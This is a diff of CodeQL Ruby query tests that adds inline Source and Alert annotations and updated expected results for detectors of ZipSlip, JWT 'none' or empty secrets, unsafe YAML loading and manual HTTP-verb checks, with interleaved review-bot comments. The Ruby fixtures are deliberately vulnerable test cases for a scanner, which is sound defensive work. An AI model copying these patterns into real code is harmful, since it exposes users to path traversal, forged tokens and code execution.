| NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:21:40:21:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:21:40:21:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:27:40:27:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:27:40:27:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:35:28:35:38 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:35:28:35:38 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.qlref b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.qlref index a5b1b23c2031..7ca9780f11c3 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.qlref +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.qlref @@ -1 +1,2 @@ -experimental/xpath-injection/XpathInjection.ql \ No newline at end of file +query: experimental/xpath-injection/XpathInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected index 65ffe942e84d..926568e388d6 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected +++ b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected 
@@ -1,3 +1,10 @@ +#select +| zip_slip.rb:10:19:10:33 | call to full_name | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:10:19:10:33 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:8:15:8:54 | call to new | potentially untrusted source | +| zip_slip.rb:22:21:22:35 | call to full_name | zip_slip.rb:20:50:20:56 | tarfile | zip_slip.rb:22:21:22:35 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:20:50:20:56 | tarfile | potentially untrusted source | +| zip_slip.rb:47:17:47:26 | call to name | zip_slip.rb:46:5:46:24 | call to open | zip_slip.rb:47:17:47:26 | call to name | This file extraction depends on a $@. | zip_slip.rb:46:5:46:24 | call to open | potentially untrusted source | +| zip_slip.rb:58:19:58:28 | call to name | zip_slip.rb:56:30:56:37 | zip_file | zip_slip.rb:58:19:58:28 | call to name | This file extraction depends on a $@. | zip_slip.rb:56:30:56:37 | zip_file | potentially untrusted source | +| zip_slip.rb:100:21:100:30 | entry_path | zip_slip.rb:90:12:90:54 | call to open | zip_slip.rb:100:21:100:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:90:12:90:54 | call to open | potentially untrusted source | +| zip_slip.rb:126:21:126:30 | entry_path | zip_slip.rb:123:12:123:34 | call to new | zip_slip.rb:126:21:126:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:123:12:123:34 | call to new | potentially untrusted source | edges | zip_slip.rb:8:5:8:11 | tarfile | zip_slip.rb:9:5:9:11 | tarfile | provenance | | | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:8:5:8:11 | tarfile | provenance | | 
@@ -71,10 +78,3 @@ nodes | zip_slip.rb:125:22:125:36 | call to full_name | semmle.label | call to full_name | | zip_slip.rb:126:21:126:30 | entry_path | semmle.label | entry_path | subpaths -#select -| zip_slip.rb:10:19:10:33 | call to full_name | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:10:19:10:33 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:8:15:8:54 | call to new | potentially untrusted source | -| zip_slip.rb:22:21:22:35 | call to full_name | zip_slip.rb:20:50:20:56 | tarfile | zip_slip.rb:22:21:22:35 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:20:50:20:56 | tarfile | potentially untrusted source | -| zip_slip.rb:47:17:47:26 | call to name | zip_slip.rb:46:5:46:24 | call to open | zip_slip.rb:47:17:47:26 | call to name | This file extraction depends on a $@. | zip_slip.rb:46:5:46:24 | call to open | potentially untrusted source | -| zip_slip.rb:58:19:58:28 | call to name | zip_slip.rb:56:30:56:37 | zip_file | zip_slip.rb:58:19:58:28 | call to name | This file extraction depends on a $@. | zip_slip.rb:56:30:56:37 | zip_file | potentially untrusted source | -| zip_slip.rb:100:21:100:30 | entry_path | zip_slip.rb:90:12:90:54 | call to open | zip_slip.rb:100:21:100:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:90:12:90:54 | call to open | potentially untrusted source | -| zip_slip.rb:126:21:126:30 | entry_path | zip_slip.rb:123:12:123:34 | call to new | zip_slip.rb:126:21:126:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:123:12:123:34 | call to new | potentially untrusted source | diff --git a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.qlref b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.qlref index 2ecd57e4b2bc..a5b8c00322e5 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.qlref 
@@ -1 +1,2 @@ -experimental/cwe-022-zipslip/ZipSlip.ql +query: experimental/cwe-022-zipslip/ZipSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/zip_slip.rb b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/zip_slip.rb index 4e5aa27d00a1..72c8c4701fcb 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/zip_slip.rb +++ b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/zip_slip.rb @@ -5,9 +5,9 @@ class TestController < ActionController::Base def tarReaderUnsafe path = params[:path] file_stream = IO.new(IO.sysopen(path)) - tarfile = Gem::Package::TarReader.new(file_stream) + tarfile = Gem::Package::TarReader.new(file_stream) # $ Source tarfile.each do |entry| - ::File.open(entry.full_name, "wb") do |os| + ::File.open(entry.full_name, "wb") do |os| # $ Alert entry.read end end @@ -17,9 +17,9 @@ def tarReaderUnsafe def tarReaderBlockUnsafe path = params[:path] file_stream = IO.new(IO.sysopen(path)) - Gem::Package::TarReader.new(file_stream) do |tarfile| + Gem::Package::TarReader.new(file_stream) do |tarfile| # $ Source tarfile.each_entry do |entry| - ::File.open(entry.full_name, "wb") do |os| + ::File.open(entry.full_name, "wb") do |os| # $ Alert entry.read end end @@ -43,8 +43,8 @@ def tarReadeSanitizedExpandPath # BAD def zipFileUnsafe path = params[:path] - Zip::File.open(path).each do |entry| - File.open(entry.name, "wb") do |os| + Zip::File.open(path).each do |entry| # $ Source + File.open(entry.name, "wb") do |os| # $ Alert entry.read end end @@ -53,9 +53,9 @@ def zipFileUnsafe # BAD def zipFileBlockUnsafe path = params[:path] - Zip::File.open(path) do |zip_file| + Zip::File.open(path) do |zip_file| # $ Source zip_file.each do |entry| - File.open(entry.name, "wb") do |os| + File.open(entry.name, "wb") do |os| # $ Alert entry.read end end 
@@ -87,7 +87,7 @@ def zipFileSanitizedConstCompare end def get_compressed_file_stream(compressed_file_path) - gzip = Zlib::GzipReader.open(compressed_file_path) + gzip = Zlib::GzipReader.open(compressed_file_path) # $ Source yield(gzip) end @@ -97,7 +97,7 @@ def gzipReaderUnsafe get_compressed_file_stream(path) do |compressed_file| compressed_file.each do |entry| entry_path = entry.full_name - ::File.open(entry_path, 'wb') do |os| + ::File.open(entry_path, 'wb') do |os| # $ Alert entry.read end end @@ -120,10 +120,10 @@ def gzipReaderSafeConstPath def gzipReaderUnsafeNewInstance path = params[:path] File.open(path, 'rb') do |f| - gz = Zlib::GzipReader.new(f) + gz = Zlib::GzipReader.new(f) # $ Source gz.each do |entry| entry_path = entry.full_name - ::File.open(entry_path, 'wb') do |os| + ::File.open(entry_path, 'wb') do |os| # $ Alert entry.read end end diff --git a/ruby/ql/test/query-tests/experimental/cwe-176/UnicodeBypassValidation.qlref b/ruby/ql/test/query-tests/experimental/cwe-176/UnicodeBypassValidation.qlref index 2faba2ebb125..1fe05308e87b 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-176/UnicodeBypassValidation.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-176/UnicodeBypassValidation.qlref @@ -1 +1 @@ -experimental/cwe-176/UnicodeBypassValidation.ql +query: experimental/cwe-176/UnicodeBypassValidation.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.qlref b/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.qlref index 3d034add0ba4..c6f2acf7d750 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.qlref @@ -1 +1,2 @@ -experimental/cwe-347/EmptyJWTSecret.ql \ No newline at end of file +query: experimental/cwe-347/EmptyJWTSecret.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.rb b/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.rb index a78ec0d0421b..8744163786c6 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.rb +++ b/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.rb @@ -6,10 +6,10 @@ token1 = JWT.encode({ foo: 'bar' }, "secret", 'none') # BAD: the secret used is empty -token2 = JWT.encode({ foo: 'bar' }, nil, 'HS256') +token2 = JWT.encode({ foo: 'bar' }, nil, 'HS256') # $ Alert[rb/jwt-empty-secret-or-algorithm] # BAD: the secret used is empty -token3 = JWT.encode({ foo: 'bar' }, "", 'HS256') +token3 = JWT.encode({ foo: 'bar' }, "", 'HS256') # $ Alert[rb/jwt-empty-secret-or-algorithm] # GOOD: the token is signed token4 = JWT.encode({ foo: 'bar' }, "secret", 'HS256') \ No newline at end of file diff --git a/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.qlref b/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.qlref index 793275aef112..dba60e5fbb48 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.qlref @@ -1 +1,2 @@ -experimental/cwe-347/MissingJWTVerification.ql \ No newline at end of file +query: experimental/cwe-347/MissingJWTVerification.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.rb b/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.rb index 4c5bd08094ed..388eabbe7d58 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.rb +++ b/ruby/ql/test/query-tests/experimental/cwe-347/MissingJWTVerification.rb 
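Review bot: `token1 = JWT.encode({ foo: 'bar' }, "secret", 'none')` in EmptyJWTSecret.rb is left without an annotation, while `JWT.encode(payload, nil, 'none')` in MissingJWTVerification.rb uses the same `'none'` algorithm and is annotated `Alert[rb/jwt-empty-secret-or-algorithm]`. The comment that classifies token1 is outside this hunk, so its intent cannot be confirmed from here, but a token encoded with `'none'` is unsigned whatever secret is passed. If the query is meant to report it and currently does not, record that with `# $ MISSING: Alert[rb/jwt-empty-secret-or-algorithm]` rather than leaving the line silent.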
@@ -3,19 +3,19 @@ payload = { foo: 'bar' } # Unsecure token -token_without_signature = JWT.encode(payload, nil, 'none') +token_without_signature = JWT.encode(payload, nil, 'none') # $ Alert[rb/jwt-empty-secret-or-algorithm] # Secure token token = JWT.encode(payload, "secret", 'HS256') # BAD: it does not verify -decoded_token1 = JWT.decode(token_without_signature, nil, false, algorithm: 'HS256') +decoded_token1 = JWT.decode(token_without_signature, nil, false, algorithm: 'HS256') # $ Alert[rb/jwt-missing-verification] # BAD: it's using none -decoded_token3 = JWT.decode(token_without_signature, secret, true, algorithm: 'none') +decoded_token3 = JWT.decode(token_without_signature, secret, true, algorithm: 'none') # $ Alert[rb/jwt-missing-verification] # BAD: it's using none -decoded_token4 = JWT.decode(token_without_signature, secret, true, { algorithm: 'none' }) +decoded_token4 = JWT.decode(token_without_signature, secret, true, { algorithm: 'none' }) # $ Alert[rb/jwt-missing-verification] # GOOD: it does verify decoded_token5 = JWT.decode(token, secret, 'HS256') diff --git a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected index 0fa5f9158300..0cfb19a43619 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected +++ b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.expected 
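Review bot: The GOOD case `decoded_token5 = JWT.decode(token, secret, 'HS256')` passes the algorithm name in the third positional slot, which the other calls in this hunk use for the verify flag (`..., nil, false, algorithm: 'HS256'`). It appears to verify only because a non-empty string is truthy, and no algorithm is pinned. Since an unannotated line now asserts that no alert is expected, the safe example is better written as `decoded_token5 = JWT.decode(token, secret, true, algorithm: 'HS256')`. `secret` is also not assigned anywhere in the hunk, though it may be defined in the two lines above it.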
@@ -1,3 +1,18 @@ +#select +| UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | Unsafe deserialization depends on a $@. 
| UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | +| UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | value from stdin | +| UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | value from stdin | +| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | Unsafe deserialization depends on a $@. 
| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | value from stdin | +| UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | value from stdin | +| UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | value from stdin | edges | UnsafeYamlDeserialization.rb:10:5:10:13 | yaml_data | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | provenance | | | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:10:17:10:28 | ...[...] | provenance | | 
@@ -39,18 +54,3 @@ nodes | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | semmle.label | call to gets | | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | semmle.label | call to readlines | subpaths -#select -| UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | UnsafeYamlDeserialization.rb:11:25:11:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:10:17:10:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | UnsafeYamlDeserialization.rb:18:25:18:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:17:17:17:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:33:32:33:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:34:37:34:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:35:32:35:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:37:14:37:33 | call to to_ruby | Unsafe deserialization depends on a $@. 
| UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:38:14:38:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:39:14:39:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | UnsafeYamlDeserialization.rb:49:14:49:32 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:32:17:32:22 | call to params | user-provided value | -| UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:61:24:61:34 | call to read | value from stdin | -| UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:64:24:64:33 | call to gets | value from stdin | -| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | Unsafe deserialization depends on a $@. 
| UnsafeYamlDeserialization.rb:67:24:67:32 | call to read | value from stdin | -| UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:70:24:70:27 | call to gets | value from stdin | -| UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeYamlDeserialization.rb:73:24:73:32 | call to readlines | value from stdin | diff --git a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.qlref b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.qlref index 991ba757e43a..f7fb7dfe3fc4 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.qlref @@ -1 +1,2 @@ -experimental/cwe-502/UnsafeYamlDeserialization.ql \ No newline at end of file +query: experimental/cwe-502/UnsafeYamlDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.rb b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.rb index c9b186e0915b..dc3e1cbab95b 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.rb +++ b/ruby/ql/test/query-tests/experimental/cwe-502/UnsafeYamlDeserialization.rb 
@@ -7,15 +7,15 @@ class UsersController < ActionController::Base # BAD before psych version 4.0.0 and def route1 - yaml_data = params[:key] - object = Psych.load yaml_data + yaml_data = params[:key] # $ Source + object = Psych.load yaml_data # $ Alert object = Psych.load_file yaml_data end # GOOD In psych version 4.0.0 and above def route2 - yaml_data = params[:key] - object = Psych.load yaml_data + yaml_data = params[:key] # $ Source + object = Psych.load yaml_data # $ Alert object = Psych.load_file yaml_data end @@ -29,14 +29,14 @@ def route3 # BAD def route4 - yaml_data = params[:key] - object = Psych.unsafe_load(yaml_data) - object = Psych.unsafe_load_file(yaml_data) - object = Psych.load_stream(yaml_data) + yaml_data = params[:key] # $ Source + object = Psych.unsafe_load(yaml_data) # $ Alert + object = Psych.unsafe_load_file(yaml_data) # $ Alert + object = Psych.load_stream(yaml_data) # $ Alert parse_output = Psych.parse_stream(yaml_data) - object = parse_output.to_ruby - object = Psych.parse(yaml_data).to_ruby - object = Psych.parse_file(yaml_data).to_ruby + object = parse_output.to_ruby # $ Alert + object = Psych.parse(yaml_data).to_ruby # $ Alert + object = Psych.parse_file(yaml_data).to_ruby # $ Alert parsed_yaml = Psych.parse_stream(yaml_data) parsed_yaml.children.each do |child| object = child.to_ruby @@ -46,7 +46,7 @@ def route4 end object = parsed_yaml.children.first.to_ruby content = parsed_yaml.children[0].children[0].children - object = parsed_yaml.to_ruby[0] + object = parsed_yaml.to_ruby[0] # $ Alert object = content.to_ruby[0] object = Psych.parse(yaml_data).children[0].to_ruby end 
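Review bot: In `route2` the line `object = Psych.load yaml_data` now carries `# $ Alert` directly under the comment `# GOOD In psych version 4.0.0 and above`, so the test labels the same call as both safe and flagged. The annotation records that the query reports `Psych.load` regardless, presumably because it cannot see which psych version is installed. Reword the comment to say so, e.g. `# Safe with psych >= 4.0.0, but still reported: the query does not know the psych version`. The comment on `route1` (`# BAD before psych version 4.0.0 and`) also looks cut off and should be finished.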
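Review bot: Several `to_ruby` calls in `route4`, which is marked `# BAD`, stay unannotated: `object = child.to_ruby` in the `@@ -29,14 +29,14 @@` hunk, and `parsed_yaml.children.first.to_ruby`, `content.to_ruby[0]` and `Psych.parse(yaml_data).children[0].to_ruby` in the `@@ -46,7 +46,7 @@` hunk. With inline expectations an unannotated line asserts that no alert is expected there, which reads as if these conversions of user-controlled YAML were safe. If they are known gaps in the query, mark them `# $ MISSING: Alert` so the false negatives stay visible. `route4` spans both hunks, and the lines between them are not shown.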
@@ -58,18 +58,18 @@ def route5 end def stdin - object = YAML.load $stdin.read + object = YAML.load $stdin.read # $ Alert # STDIN - object = YAML.load STDIN.gets + object = YAML.load STDIN.gets # $ Alert # ARGF - object = YAML.load ARGF.read + object = YAML.load ARGF.read # $ Alert # Kernel.gets - object = YAML.load gets + object = YAML.load gets # $ Alert # Kernel.readlines - object = YAML.load readlines + object = YAML.load readlines # $ Alert end end diff --git a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected index e0e85b75ebbe..b4dc532a38b3 100644 --- a/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected +++ b/ruby/ql/test/query-tests/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.expected 
@@ -1,3 +1,11 @@ +#select +| ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | ManuallyCheckHttpVerb.rb:4:8:4:19 | call to get? | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | ManuallyCheckHttpVerb.rb:11:14:11:24 | call to env | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | ManuallyCheckHttpVerb.rb:19:14:19:35 | call to request_method | ManuallyCheckHttpVerb.rb:20:8:20:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | ManuallyCheckHttpVerb.rb:27:14:27:27 | call to method | ManuallyCheckHttpVerb.rb:28:8:28:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. 
Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | ManuallyCheckHttpVerb.rb:35:14:35:39 | call to raw_request_method | ManuallyCheckHttpVerb.rb:36:8:36:22 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | ManuallyCheckHttpVerb.rb:51:16:51:44 | call to request_method_symbol | ManuallyCheckHttpVerb.rb:52:10:52:23 | ... == ... | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | +| ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | ManuallyCheckHttpVerb.rb:59:10:59:20 | call to env | ManuallyCheckHttpVerb.rb:59:10:59:38 | ...[...] | Manually checking HTTP verbs is an indication that multiple requests are routed to the same controller action. This could lead to bypassing necessary authorization methods and other protections, like CSRF protection. Prefer using different controller actions for each HTTP method and relying Rails routing to handle mapping resources and verbs to specific methods. | edges | ManuallyCheckHttpVerb.rb:11:5:11:10 | method | ManuallyCheckHttpVerb.rb:12:8:12:22 | ... == ... | provenance | | | 